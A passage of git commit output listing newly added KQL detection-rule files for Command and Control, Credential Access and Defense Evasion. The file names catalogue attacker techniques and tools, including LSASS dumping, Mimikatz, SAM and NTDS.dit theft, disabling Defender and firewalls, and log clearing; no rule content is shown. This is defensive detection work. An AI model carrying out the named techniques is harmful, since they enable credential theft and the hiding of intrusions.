Control/suspicious_certreq_command_to_download.kql create mode 100644 KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql create mode 100644 KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql create mode 100644 KQL/rules/Command and Control/suspicious_curl_exe_download.kql create mode 100644 KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql create mode 100644 KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql create mode 100644 
KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql create mode 100644 KQL/rules/Command and Control/suspicious_download_from_office_domain.kql create mode 100644 KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql create mode 100644 KQL/rules/Command and Control/suspicious_extrac32_execution.kql create mode 100644 KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql create mode 100644 KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql create mode 100644 KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql create mode 100644 KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql create mode 100644 KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql create mode 100644 KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql create mode 100644 KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql create mode 100644 KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql create mode 100644 KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql create mode 100644 KQL/rules/Command and Control/teamviewer_remote_session.kql create mode 100644 KQL/rules/Command and Control/tor_client_browser_execution.kql create mode 100644 KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql create mode 100644 KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql create mode 100644 KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql create mode 100644 KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql create mode 100644 KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql create mode 100644 KQL/rules/Command and 
Control/visual_studio_code_tunnel_shell_execution.kql create mode 100644 KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql create mode 100644 KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql create mode 100644 KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql create mode 100644 KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql create mode 100644 KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql create mode 100644 KQL/rules/Credential Access/browser_started_with_remote_debugging.kql create mode 100644 KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql create mode 100644 KQL/rules/Credential Access/certificate_exported_via_powershell.kql create mode 100644 KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql create mode 100644 KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql create mode 100644 KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql create mode 100644 KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql create mode 100644 KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql create mode 100644 KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql create mode 100644 KQL/rules/Credential Access/credentials_in_files.kql create mode 100644 KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql create mode 100644 KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql create mode 100644 KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql create mode 100644 KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql create mode 100644 KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql create mode 100644 
KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql create mode 100644 KQL/rules/Credential Access/esentutl_gather_credentials.kql create mode 100644 KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql create mode 100644 KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql create mode 100644 KQL/rules/Credential Access/findstr_gpp_passwords.kql create mode 100644 KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql create mode 100644 KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql create mode 100644 KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql create mode 100644 KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql create mode 100644 KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql create mode 100644 KQL/rules/Credential Access/hacktool_inveigh_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_krbrelay_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_lazagne_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_mimikatz_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql create mode 100644 KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql create mode 100644 KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql create mode 100644 KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql create mode 100644 KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql create mode 100644 KQL/rules/Credential 
Access/hacktool_quarkspwdump_dump_file.kql create mode 100644 KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql create mode 100644 KQL/rules/Credential Access/hacktool_safetykatz_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_securityxploded_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql create mode 100644 KQL/rules/Credential Access/hacktool_winpwn_execution.kql create mode 100644 KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql create mode 100644 KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql create mode 100644 KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql create mode 100644 KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql create mode 100644 KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql create mode 100644 KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql create mode 100644 KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql create mode 100644 KQL/rules/Credential Access/lsass_process_memory_dump_files.kql create mode 100644 KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql create mode 100644 KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql create mode 100644 KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql create mode 100644 KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql create mode 100644 KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql create mode 100644 KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql create mode 100644 KQL/rules/Credential Access/ntds_dit_created.kql create mode 
100644 KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql create mode 100644 KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql create mode 100644 KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql create mode 100644 KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql create mode 100644 KQL/rules/Credential Access/potential_browser_data_stealing.kql create mode 100644 KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql create mode 100644 KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql create mode 100644 KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql create mode 100644 KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql create mode 100644 KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql create mode 100644 KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql create mode 100644 KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql create mode 100644 KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql create mode 100644 KQL/rules/Credential Access/potential_sam_database_dump.kql create mode 100644 KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql create mode 100644 KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql create mode 100644 KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql create mode 100644 KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql create mode 100644 KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql create mode 100644 KQL/rules/Credential 
Access/potentially_suspicious_odbc_driver_registered.kql create mode 100644 KQL/rules/Credential Access/powershell_get_process_lsass.kql create mode 100644 KQL/rules/Credential Access/powershell_sam_copy.kql create mode 100644 KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql create mode 100644 KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql create mode 100644 KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql create mode 100644 KQL/rules/Credential Access/pua_mouse_lock_execution.kql create mode 100644 KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql create mode 100644 KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql create mode 100644 KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql create mode 100644 KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql create mode 100644 KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql create mode 100644 KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql create mode 100644 KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql create mode 100644 KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql create mode 100644 KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql create mode 100644 KQL/rules/Credential Access/suspicious_history_file_operations.kql create mode 100644 KQL/rules/Credential Access/suspicious_key_manager_access.kql create mode 100644 KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql create mode 100644 KQL/rules/Credential Access/suspicious_reg_add_open_command.kql create mode 100644 KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql create mode 100644 KQL/rules/Credential Access/suspicious_system_user_process_creation.kql create mode 100644 KQL/rules/Credential 
Access/suspicious_sysvol_domain_group_policy_access.kql create mode 100644 KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql create mode 100644 KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql create mode 100644 KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql create mode 100644 KQL/rules/Credential Access/wce_wceaux_dll_access.kql create mode 100644 KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql create mode 100644 KQL/rules/Credential Access/windows_credential_editor_registry.kql create mode 100644 KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql create mode 100644 KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql create mode 100644 KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql create mode 100644 KQL/rules/Defense Evasion/abusing_print_executable.kql create mode 100644 KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql create mode 100644 KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql create mode 100644 KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql create mode 100644 KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql create mode 100644 KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql create mode 100644 KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql create mode 100644 KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql create mode 100644 KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql create mode 100644 KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql create mode 100644 KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql create mode 100644 KQL/rules/Defense 
Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql create mode 100644 KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/aspnetcompiler_execution.kql create mode 100644 KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql create mode 100644 KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql create mode 100644 KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql create mode 100644 KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql create mode 100644 KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql create mode 100644 KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql create mode 100644 KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql create mode 100644 KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql create mode 100644 KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql create mode 100644 KQL/rules/Defense Evasion/binary_padding_macos.kql create mode 100644 KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql 
create mode 100644 KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql create mode 100644 KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql create mode 100644 KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql create mode 100644 KQL/rules/Defense Evasion/chmod_suspicious_directory.kql create mode 100644 KQL/rules/Defense Evasion/clear_linux_logs.kql create mode 100644 KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql create mode 100644 KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql create mode 100644 KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql create mode 100644 KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql create mode 100644 KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql create mode 100644 KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql create mode 100644 KQL/rules/Defense Evasion/connection_proxy.kql create mode 100644 KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql create mode 100644 KQL/rules/Defense Evasion/createdump_process_dump.kql create mode 100644 KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql create mode 100644 KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql create mode 100644 KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql create mode 100644 KQL/rules/Defense Evasion/decode_base64_encoded_text.kql create mode 100644 KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql create mode 100644 KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql create mode 100644 KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql create mode 100644 KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql create mode 100644 KQL/rules/Defense 
Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql create mode 100644 KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql create mode 100644 KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql create mode 100644 KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql create mode 100644 KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql create mode 100644 KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql create mode 100644 KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql create mode 100644 KQL/rules/Defense Evasion/disable_or_stop_services.kql create mode 100644 KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql create mode 100644 KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql create mode 100644 KQL/rules/Defense Evasion/disable_security_tools.kql create mode 100644 KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql create mode 100644 KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql create mode 100644 KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql create mode 100644 KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql create mode 100644 KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql create mode 100644 KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql create mode 100644 KQL/rules/Defense Evasion/disabled_ie_security_features.kql create mode 100644 KQL/rules/Defense Evasion/disabled_volume_snapshots.kql create mode 100644 KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql create mode 100644 KQL/rules/Defense Evasion/disabling_security_tools.kql create mode 100644 KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql create mode 100644 KQL/rules/Defense 
Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql create mode 100644 KQL/rules/Defense Evasion/dism_remove_online_package.kql create mode 100644 KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql create mode 100644 KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql create mode 100644 KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql create mode 100644 KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql create mode 100644 KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql create mode 100644 KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql create mode 100644 KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql create mode 100644 KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql create mode 100644 KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql create mode 100644 KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql create mode 100644 KQL/rules/Defense Evasion/dumpminitool_execution.kql create mode 100644 KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql create mode 100644 KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql create mode 100644 KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql create mode 100644 KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql create mode 100644 KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql create mode 100644 KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql create mode 100644 KQL/rules/Defense 
Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql create mode 100644 KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql create mode 100644 KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql create mode 100644 KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql create mode 100644 KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql create mode 100644 KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql create mode 100644 KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql create mode 100644 KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql create mode 100644 KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql create mode 100644 KQL/rules/Defense Evasion/execution_of_non_existing_file.kql create mode 100644 KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql create mode 100644 KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql create mode 100644 KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql create mode 100644 KQL/rules/Defense Evasion/explorer_process_tree_break.kql create mode 100644 KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql create mode 100644 KQL/rules/Defense Evasion/file_deletion.kql create mode 100644 KQL/rules/Defense Evasion/file_deletion_via_del.kql create mode 100644 KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql create mode 100644 KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql create mode 100644 KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql create mode 100644 KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql create mode 100644 KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql 
create mode 100644 KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql create mode 100644 KQL/rules/Defense Evasion/file_download_with_headless_browser.kql create mode 100644 KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/file_time_attribute_change.kql create mode 100644 KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql create mode 100644 KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql create mode 100644 KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql create mode 100644 KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql create mode 100644 KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql create mode 100644 KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql create mode 100644 KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql create mode 100644 KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql create mode 100644 KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql create mode 100644 KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql create mode 100644 KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql create mode 100644 KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql create mode 100644 KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql create mode 100644 KQL/rules/Defense Evasion/gpscript_execution.kql create mode 100644 KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql create mode 100644 KQL/rules/Defense 
Evasion/hacktool_f_secure_c3_load_by_rundll32.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_powertool_execution.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_xordump_execution.kql create mode 100644 KQL/rules/Defense Evasion/hh_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql create mode 100644 KQL/rules/Defense Evasion/hidden_user_creation.kql create mode 100644 KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql create mode 100644 KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql create mode 100644 KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql create mode 100644 KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql create mode 100644 KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql create mode 100644 KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql create mode 100644 KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql create mode 100644 KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql create mode 100644 KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql create mode 100644 KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql create mode 100644 KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql create mode 100644 KQL/rules/Defense 
Evasion/indicator_removal_on_host_clear_mac_system_logs.kql create mode 100644 KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql create mode 100644 KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql create mode 100644 KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql create mode 100644 KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql create mode 100644 KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql create mode 100644 KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql create mode 100644 KQL/rules/Defense Evasion/install_root_certificate.kql create mode 100644 KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql create mode 100644 KQL/rules/Defense Evasion/jscript_compiler_execution.kql create mode 100644 KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql create mode 100644 KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql create mode 100644 KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql create mode 100644 KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql 
create mode 100644 KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql create mode 100644 KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql create mode 100644 KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql create mode 100644 KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql create mode 100644 KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql create mode 100644 KQL/rules/Defense Evasion/linux_doas_tool_execution.kql create mode 100644 KQL/rules/Defense Evasion/linux_package_uninstall.kql create mode 100644 KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql create mode 100644 KQL/rules/Defense Evasion/livekd_driver_creation.kql create mode 100644 KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql create mode 100644 KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql create mode 100644 KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql create mode 100644 KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql create mode 100644 KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql create mode 100644 KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql create mode 100644 KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql create mode 100644 KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql create mode 100644 KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql create mode 100644 KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql create mode 100644 KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql create mode 100644 KQL/rules/Defense Evasion/modify_group_policy_settings.kql create mode 100644 KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql create mode 100644 
